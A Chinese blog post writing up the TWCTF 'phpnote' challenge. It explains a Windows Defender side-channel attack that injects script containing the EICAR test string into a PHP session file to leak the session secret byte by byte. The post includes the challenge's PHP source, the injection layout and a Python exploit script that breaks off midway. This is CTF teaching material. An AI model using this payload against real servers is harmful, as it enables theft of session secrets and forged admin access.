<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>从一道CTF题了解Windows-Defender侧信道攻击 | 七友 | 路漫漫其修远兮，吾将上下而求索</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="ctf,侧信道攻击">
    <meta name="description" content="前言前几天打了一下由tokyowesterns举办的TWCTF，感觉phpnote这题还是不错的，一个全新的知识点，比赛的时候没有解出来，赛后问了一下梅子酒才知道这个是用windows-defender测信道攻击，下面记录一下解题过程 前置知识Windows Defender介绍 来自WIKI  Windows Defender（Windows 10创意者更新后名为Windows Defender">
<meta name="keywords" content="ctf,侧信道攻击">
<meta property="og:type" content="article">
<meta property="og:title" content="从一道CTF题了解Windows-Defender侧信道攻击">
<meta property="og:url" content="https://byqiyou.github.io/2019/09/08/从一道CTF题了解Windows-Defender侧信道攻击/index.html">
<meta property="og:site_name" content="七友">
<meta property="og:description" content="前言前几天打了一下由tokyowesterns举办的TWCTF，感觉phpnote这题还是不错的，一个全新的知识点，比赛的时候没有解出来，赛后问了一下梅子酒才知道这个是用windows-defender测信道攻击，下面记录一下解题过程 前置知识Windows Defender介绍 来自WIKI  Windows Defender（Windows 10创意者更新后名为Windows Defender">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190909232234-a61c12ca-d315-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190908221400-e78b2e22-d242-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190908214839-5cd883ea-d23f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190909233328-2be928d8-d317-1.png">
<meta property="og:updated_time" content="2019-09-13T03:36:27.160Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="从一道CTF题了解Windows-Defender侧信道攻击">
<meta name="twitter:description" content="前言前几天打了一下由tokyowesterns举办的TWCTF，感觉phpnote这题还是不错的，一个全新的知识点，比赛的时候没有解出来，赛后问了一下梅子酒才知道这个是用windows-defender测信道攻击，下面记录一下解题过程 前置知识Windows Defender介绍 来自WIKI  Windows Defender（Windows 10创意者更新后名为Windows Defender">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190909232234-a61c12ca-d315-1.png">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname"></h5>
          <a href="mailto:1920854803@qq.com" title="1920854803@qq.com" class="mail">1920854803@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/byqiyou" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/friends"  >
                <i class="icon icon-lg icon-friends"></i>
                Friends
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/about"  >
                <i class="icon icon-lg icon-about"></i>
                About
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">从一道CTF题了解Windows-Defender侧信道攻击</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="输入感兴趣的关键字">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">从一道CTF题了解Windows-Defender侧信道攻击</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-09-08T13:45:21.000Z" itemprop="datePublished" class="page-time">
  2019-09-08
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#前言"><span class="post-toc-number">1.</span> <span class="post-toc-text">前言</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#前置知识"><span class="post-toc-number">2.</span> <span class="post-toc-text">前置知识</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Windows-Defender介绍"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">Windows Defender介绍</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#关于-mpengine-dll"><span class="post-toc-number">2.2.</span> <span class="post-toc-text">关于 mpengine.dll</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Windows-Defender触发机制"><span class="post-toc-number">2.3.</span> <span class="post-toc-text">Windows-Defender触发机制</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#phpnote"><span class="post-toc-number">3.</span> <span class="post-toc-text">phpnote</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Reference"><span class="post-toc-number"></span> <span class="post-toc-text">Reference</span></a>
        </nav>
    </aside>


<article id="post-从一道CTF题了解Windows-Defender侧信道攻击"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">从一道CTF题了解Windows-Defender侧信道攻击</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-09-08 21:45:21" datetime="2019-09-08T13:45:21.000Z"  itemprop="datePublished">2019-09-08</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>前几天打了一下由<code>tokyowesterns</code>举办的TWCTF，感觉phpnote这题还是不错的，一个全新的知识点，比赛的时候没有解出来，赛后问了一下梅子酒才知道这个是用<code>windows-defender</code>测信道攻击，下面记录一下解题过程</p>
<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h3 id="Windows-Defender介绍"><a href="#Windows-Defender介绍" class="headerlink" title="Windows Defender介绍"></a>Windows Defender介绍</h3><blockquote>
<p>来自WIKI</p>
</blockquote>
<p><code>Windows Defender</code>（Windows 10创意者更新后名为<code>Windows Defender Antivirus</code>），曾用名<code>Microsoft AntiSpyware</code>，最初是用来移除、隔离和预防间谍软件的程序，可以运行在Windows XP以及更高版本的操作系统上，并已经内置在<code>Windows Vista</code>以及以后的版本中。<code>Windows Defender</code>的定义库更新很频繁。在Windows 8及之后的系统中取代<code>Microsoft Security Essentials</code>，成为一款全面反病毒软件。</p>
<h3 id="关于-mpengine-dll"><a href="#关于-mpengine-dll" class="headerlink" title="关于 mpengine.dll"></a>关于 mpengine.dll</h3><p><code>TokyoWesterns</code>在PPT上是这么描述的<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190909232234-a61c12ca-d315-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<p><code>mpengine.dll</code>是<code>Windows Defender</code>核心的ddl文件，其中它包含了JS引擎，它继承了JS的一些基础语法，其中它支持eval函数，但是它会对eval函数的参数进行检测，如果发现恶意数据则会进行拦截</p>
<h3 id="Windows-Defender触发机制"><a href="#Windows-Defender触发机制" class="headerlink" title="Windows-Defender触发机制"></a>Windows-Defender触发机制</h3><p>在WCTF2019上<code>TokyoWesterns</code>出了一个关于<code>Windows Defender</code>侧信道攻击的题目，赛后分享的PPT地址为：<a href="https://westerns.tokyo/wctf2019-gtf/wctf2019-gtf-slides.pdf" target="_blank" rel="noopener">链接</a></p>
<p>Defender对文件的检测行为如下（摘自TokyoWesterns的PPT）：<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190908221400-e78b2e22-d242-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<p>所以我们第一步是要找到能触发<code>Windows Defender</code>检测机制的文件，<code>EICAR</code>测试文件可以做到这一点，关于EICAR测试文件的解释如下（<a href="http://docs.trendmicro.com/all/ent/de/v1.5/zh-cn/de_1.5_olh/ctm_ag/ctm1_ag_ch8/t_test_eicar_file.htm" target="_blank" rel="noopener">参考链接</a>）：<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">欧洲计算机防病毒研究所 (EICAR) 开发了一种测试病毒，可用于测试您的防病毒设备。此脚本是一个惰性文本文件。二进制特征码包含在多数防病毒产品供应商的病毒码文件中。它本质上不是病毒，并且不包含任何程序代码。</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>我们可以从上面的参考链接中下载到这样的一个EICAR测试文件<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后我们在本地测试一下看看会不会拦截<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190908214839-5cd883ea-d23f-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<p>可以明显看到被拦截了，但是如果把这个字符破坏掉就不会被拦截，所以我们可以利用<code>Windows Defender</code>这一点来进行侧信道攻击</p>
<h2 id="phpnote"><a href="#phpnote" class="headerlink" title="phpnote"></a>phpnote</h2><p>从注释中得到<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://phpnote.chal.ctf.westerns.tokyo/?action=source</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>源码<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'config.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Note</span> </span>{</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($admin)</span> </span>{</span><br><span class="line">        <span class="keyword">$this</span>-&gt;notes = <span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">$this</span>-&gt;isadmin = $admin;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">addnote</span><span class="params">($title, $body)</span> </span>{</span><br><span class="line">        array_push(<span class="keyword">$this</span>-&gt;notes, [$title, $body]);</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getnotes</span><span class="params">()</span> </span>{</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;notes;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getflag</span><span class="params">()</span> </span>{</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">$this</span>-&gt;isadmin === <span class="keyword">true</span>) {</span><br><span class="line">            <span class="keyword">echo</span> FLAG;</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">verify</span><span class="params">($data, $hmac)</span> </span>{</span><br><span class="line">    $secret = $_SESSION[<span class="string">'secret'</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">empty</span>($secret)) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">return</span> hash_equals(hash_hmac(<span class="string">'sha256'</span>, $data, $secret), $hmac);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">hmac</span><span class="params">($data)</span> </span>{</span><br><span class="line">    $secret = $_SESSION[<span class="string">'secret'</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">empty</span>($data) || <span class="keyword">empty</span>($secret)) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">return</span> hash_hmac(<span class="string">'sha256'</span>, $data, $secret);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">gen_secret</span><span class="params">($seed)</span> </span>{</span><br><span class="line">    <span class="keyword">return</span> md5(SALT . $seed . PEPPER);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_login</span><span class="params">()</span> </span>{</span><br><span class="line">    <span class="keyword">return</span> !<span class="keyword">empty</span>($_SESSION[<span class="string">'secret'</span>]);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">redirect</span><span class="params">($action)</span> </span>{</span><br><span class="line">    header(<span class="string">"Location: /?action=$action"</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$method = $_SERVER[<span class="string">'REQUEST_METHOD'</span>];</span><br><span class="line">$action = $_GET[<span class="string">'action'</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!in_array($action, [<span class="string">'index'</span>, <span class="string">'login'</span>, <span class="string">'logout'</span>, <span class="string">'post'</span>, <span class="string">'source'</span>, <span class="string">'getflag'</span>])) {</span><br><span class="line">    redirect(<span class="string">'index'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($action === <span class="string">'source'</span>) {</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (is_login()) {</span><br><span class="line">    $realname = $_SESSION[<span class="string">'realname'</span>];</span><br><span class="line">    $nickname = $_SESSION[<span class="string">'nickname'</span>];</span><br><span class="line"></span><br><span class="line">    $note = verify($_COOKIE[<span class="string">'note'</span>], $_COOKIE[<span class="string">'hmac'</span>])</span><br><span class="line">            ? unserialize(base64_decode($_COOKIE[<span class="string">'note'</span>]))</span><br><span class="line">            : <span class="keyword">new</span> Note(<span class="keyword">false</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($action === <span class="string">'login'</span>) {</span><br><span class="line">    <span class="keyword">if</span> ($method === <span class="string">'POST'</span>) {</span><br><span class="line">        $nickname = (string)$_POST[<span class="string">'nickname'</span>];</span><br><span class="line">        $realname = (string)$_POST[<span class="string">'realname'</span>];</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">empty</span>($realname) || strlen($realname) &lt; <span class="number">8</span>) {</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'invalid name'</span>);</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        $_SESSION[<span class="string">'realname'</span>] = $realname;</span><br><span class="line">        <span class="keyword">if</span> (!<span class="keyword">empty</span>($nickname)) {</span><br><span class="line">            $_SESSION[<span class="string">'nickname'</span>] = $nickname;</span><br><span class="line">        }</span><br><span class="line">        $_SESSION[<span class="string">'secret'</span>] = gen_secret($nickname);</span><br><span class="line">    }</span><br><span class="line">    redirect(<span class="string">'index'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($action === <span class="string">'logout'</span>) {</span><br><span class="line">    session_destroy();</span><br><span class="line">    redirect(<span class="string">'index'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($action === <span class="string">'post'</span>) {</span><br><span class="line">    <span class="keyword">if</span> ($method === <span class="string">'POST'</span>) {</span><br><span class="line">        $title = (string)$_POST[<span class="string">'title'</span>];</span><br><span class="line">        $body = (string)$_POST[<span class="string">'body'</span>];</span><br><span class="line">        $note-&gt;addnote($title, $body);</span><br><span class="line">        $data = base64_encode(serialize($note));</span><br><span class="line">        setcookie(<span class="string">'note'</span>, (string)$data);</span><br><span class="line">        setcookie(<span class="string">'hmac'</span>, (string)hmac($data));</span><br><span class="line">    }</span><br><span class="line">    redirect(<span class="string">'index'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($action === <span class="string">'getflag'</span>) {</span><br><span class="line">    $note-&gt;getflag();</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//.....省略部分源码....</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>关键代码如下<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">verify</span><span class="params">($data, $hmac)</span> </span>{</span><br><span class="line">    $secret = $_SESSION[<span class="string">'secret'</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">empty</span>($secret)) <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">return</span> hash_equals(hash_hmac(<span class="string">'sha256'</span>, $data, $secret), $hmac);</span><br><span class="line">}</span><br><span class="line"><span class="comment">//....省略.....</span></span><br><span class="line">    $note = verify($_COOKIE[<span class="string">'note'</span>], $_COOKIE[<span class="string">'hmac'</span>])</span><br><span class="line">            ? unserialize(base64_decode($_COOKIE[<span class="string">'note'</span>]))</span><br><span class="line">            : <span class="keyword">new</span> Note(<span class="keyword">false</span>);</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>从上面代码可以看出cookie里面数据是经过签名校验的，但是我们<code>secret</code>不知道，所以直接伪造cookie这条路走不通了，由于php的<code>session</code>是以文件的形式保存的，也就是说我们可以把我们的恶意数据注入到<code>session</code>的文件中，从而触发<code>Windows Defender</code>的检测机制，但是我们怎么控制<code>session</code>文件内容呢，我们先看一下<code>session</code>文件保存的内容</p>
<p>我们用下面代码测试一下<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">define(SALT,<span class="string">"test"</span>);</span><br><span class="line">define(PEPPER, <span class="string">"test"</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">gen_secret</span><span class="params">($seed)</span> </span>{</span><br><span class="line">    <span class="keyword">return</span> md5(SALT . $seed . PEPPER);</span><br><span class="line">}</span><br><span class="line">session_start();</span><br><span class="line">$nickname = <span class="string">"rootroot"</span>;</span><br><span class="line">$realname = <span class="string">"adminadminadmin"</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">empty</span>($realname) || strlen($realname) &lt; <span class="number">8</span>) {</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'invalid name'</span>);</span><br><span class="line">}</span><br><span class="line">$_SESSION[<span class="string">'realname'</span>] = $realname;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>($nickname)) {</span><br><span class="line">	$_SESSION[<span class="string">'nickname'</span>] = $nickname;</span><br><span class="line">}</span><br><span class="line">        $_SESSION[<span class="string">'secret'</span>] = gen_secret($nickname);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p><code>session</code>文件内容如下，第一次我们先post<code>nickname</code>为空，因为nickname是在<code>secret</code>先设置，如果我们不设置<code>nickname</code>为空，<code>nickname</code>的值会出现<code>secret</code>，导致我们注入恶意数据读取不了<code>secret</code>，我们可以看一下两者的区别<br>第一次post<code>nickname</code>值不为空时<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">realname|s:15:"adminadminadmin";nickname|s:8:"rootroot";secret|s:32:"70034bb522e6f77c6f3e88d18b86c6df";</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>第一次post<code>nickname</code>值为空时，第二次post个<code>rootroot</code><br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">realname|s:15:"adminadminadmin";secret|s:32:"70034bb522e6f77c6f3e88d18b86c6df";nickname|s:8:"rootroot";</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后<code>nickname</code>和<code>realname</code>的值我们可以控，所以我们可以在这两个值之间注入我们的恶意数据，例如<code>realname</code>为<code>&lt;script&gt;xxxxxx&lt;/script&gt;&lt;body&gt;</code>，然后<code>nickname</code>为：<code></code><br>闭合之后就是<br></p><figure class="highlight html"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>xxxxxx<span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;<span class="name">body</span>&gt;</span>";secret|s:32:"70034bb522e6f77c6f3e88d18b86c6df";nickname|s:8:"<span class="tag">&lt;/<span class="name">body</span>&gt;</span>";</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后刚好secret在body标签内<br></p><figure class="highlight html"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span>";secret|s:32:"70034bb522e6f77c6f3e88d18b86c6df";nickname|s:8:"<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>这意味着我们可以利用<code>document.body.innerHTML</code>读到我们的<code>secret</code></p>
<p>梳理一下攻击步骤，大致步骤如下：</p>
<ol>
<li>向session文件中注入恶意数据</li>
<li>利用Windows-Defender的检测机制，然后观察是否返回正常，如果检测的到恶意数据的话会登陆失败，否则则登陆成功</li>
<li>在<code>realname</code>和<code>nickname</code>之间嵌入JS脚本，然后逐字节泄露<code>secret</code></li>
</ol>
<p>改一下作者原来在WCTF上<code>Gyotaku</code>的脚本，跑一下<br></p><figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://phpnote.chal.ctf.westerns.tokyo/?action="</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">randstr</span><span class="params">(n=<span class="number">8</span>)</span>:</span></span><br><span class="line">    <span class="keyword">import</span> random</span><br><span class="line">    <span class="keyword">import</span> string</span><br><span class="line">    chars = string.ascii_uppercase + string.ascii_lowercase + string.digits</span><br><span class="line">    <span class="keyword">return</span> <span class="string">''</span>.join([random.choice(chars) <span class="keyword">for</span> _ <span class="keyword">in</span> range(n)])</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">trigger</span><span class="params">(c, idx)</span>:</span></span><br><span class="line">    <span class="keyword">import</span> string</span><br><span class="line">    prefix = randstr()</span><br><span class="line">    p = prefix + <span class="string">'''&lt;script&gt;f=function(n){eval('X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$$H+H'+{${c}:'*'}[Math.min(${c},n)])};f(document.body.innerHTML[${idx}].charCodeAt(0));&lt;/script&gt;&lt;body&gt;'''</span></span><br><span class="line">    payload = string.Template(p).substitute({<span class="string">'idx'</span>: idx, <span class="string">'c'</span>: c})</span><br><span class="line">    session = requests.session()</span><br><span class="line">    data_1 = {</span><br><span class="line">        <span class="string">"nickname"</span>: <span class="string">""</span>,</span><br><span class="line">        <span 